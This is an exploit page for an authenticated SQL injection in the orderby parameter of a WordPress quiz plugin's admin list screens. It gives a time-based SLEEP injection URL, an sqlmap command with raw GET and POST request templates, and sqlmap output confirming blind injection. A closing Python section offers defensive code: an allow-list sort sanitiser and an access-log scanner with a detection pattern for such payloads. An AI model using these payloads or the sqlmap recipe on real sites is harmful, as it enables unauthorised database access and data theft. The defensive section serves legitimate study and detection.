## https://sploitus.com/exploit?id=WPEX-ID:929AD37D-9CDB-4117-8CD3-CF7130A7C9D4
All the files in includes/lists/ were affected; the PoCs below are just examples of them.

https://example.com/wp-admin/admin.php?page=quiz-maker-question-categories&orderby=title%20AND%20(SELECT%206418%20FROM%20(SELECT(SLEEP(5)))PLuH)&order=asc


SQLMAP: python sqlmap.py -r r.txt -p orderby --level 5 --risk 3 --dbms MySQL --technique B --dbs
where r.txt contains the GET or POST request used to sort quizzes:

GET /wp-admin/admin.php?page=quiz-maker&orderby=id--&order=desc HTTP/1.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: vi-VN,vi;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Connection: close
Cookie: [admin+]
Upgrade-Insecure-Requests: 1

OR:

POST /wp-admin/admin.php?page=quiz-maker HTTP/1.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: vi-VN,vi;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Content-Length: 87
Connection: close
Cookie: [admin+]

orderby=id--&order=desc&s=d&action=-1&paged=1&filterby-top=&action2=-1&filterby-bottom=

SQLMAP OUTPUT:
---
Parameter: orderby (GET)
    Type: boolean-based blind
    Title: Boolean-based blind - Parameter replace (original value)
    Payload: page=quiz-maker&orderby=(SELECT (CASE WHEN (5750=5750) THEN 0x7469746c65 ELSE (SELECT 1570 UNION SELECT 3396) END))&order=asc
---
[22:38:25] [INFO] testing MySQL
[22:38:25] [INFO] confirming MySQL
[22:38:25] [INFO] the back-end DBMS is MySQL
web server operating system: Linux Ubuntu 20.04 or 19.10 (focal or eoan)
web application technology: Apache 2.4.41
back-end DBMS: MySQL >= 8.0.0
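As an added defensive example, not part of this PoC or of the plugin's own code: `safe_sort` shows how a list screen can accept `orderby`/`order` without ever concatenating the raw value into ORDER BY, and `scan_access_log` flags requests of the shape shown above in constructed Apache access-log lines. The allowed column names and the log lines are assumed for illustration.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Allow-list of sort columns for the quiz list screens. The names are assumed
# for illustration, not taken from the plugin; anything else gets the default.
ALLOWED_ORDERBY = {"id", "title", "status", "create_date"}
ALLOWED_ORDER = {"asc", "desc"}

def safe_sort(params, default_by="id", default_order="desc"):
    """Return an (orderby, order) pair that is safe to splice into ORDER BY.
    The raw value is only compared against the allow-list, never concatenated,
    so 'id--' or 'title AND (SELECT ...)' can only yield the defaults."""
    orderby = params.get("orderby", [default_by])[0].strip().lower()
    order = params.get("order", [default_order])[0].strip().lower()
    if orderby not in ALLOWED_ORDERBY:
        orderby = default_by
    if order not in ALLOWED_ORDER:
        order = default_order
    return orderby, order

# A legitimate sort key is a bare identifier: whitespace, parentheses, quotes
# or SQL comment markers in orderby mark a request worth reviewing.
SUSPICIOUS = re.compile(r"[\s()'\"]|--|/\*")

def scan_access_log(lines):
    """Return (client_ip, page, orderby) for admin.php requests whose orderby
    is not an allow-listed identifier. Only GET payloads appear in access
    logs; POST bodies like the one above need request-body logging or a WAF."""
    hits = []
    for line in lines:
        m = re.search(r'"(?:GET|POST) (\S+) HTTP', line)
        if not m:
            continue
        url = urlsplit(m.group(1))
        if not url.path.endswith("/wp-admin/admin.php"):
            continue
        qs = parse_qs(url.query, keep_blank_values=True)
        for value in qs.get("orderby", []):
            if SUSPICIOUS.search(value) or value.lower() not in ALLOWED_ORDERBY:
                hits.append((line.split()[0], qs.get("page", [""])[0], value))
    return hits

# Constructed Apache combined-format lines modelled on the PoC requests above.
SAMPLE_LOG = [
    '203.0.113.5 - - [01/Jan/2023:22:38:20 +0000] "GET /wp-admin/admin.php?page=quiz-maker&orderby=id&order=desc HTTP/1.1" 200 5120',
    '203.0.113.5 - - [01/Jan/2023:22:38:25 +0000] "GET /wp-admin/admin.php?page=quiz-maker&orderby=id--&order=desc HTTP/1.1" 200 5120',
    '203.0.113.5 - - [01/Jan/2023:22:38:30 +0000] "GET /wp-admin/admin.php?page=quiz-maker-question-categories&orderby=title%20AND%20(SELECT%206418%20FROM%20(SELECT(SLEEP(5)))PLuH)&order=asc HTTP/1.1" 200 5120',
]
```

Running `scan_access_log(SAMPLE_LOG)` returns the two tampered requests and leaves the plain `orderby=id` request alone.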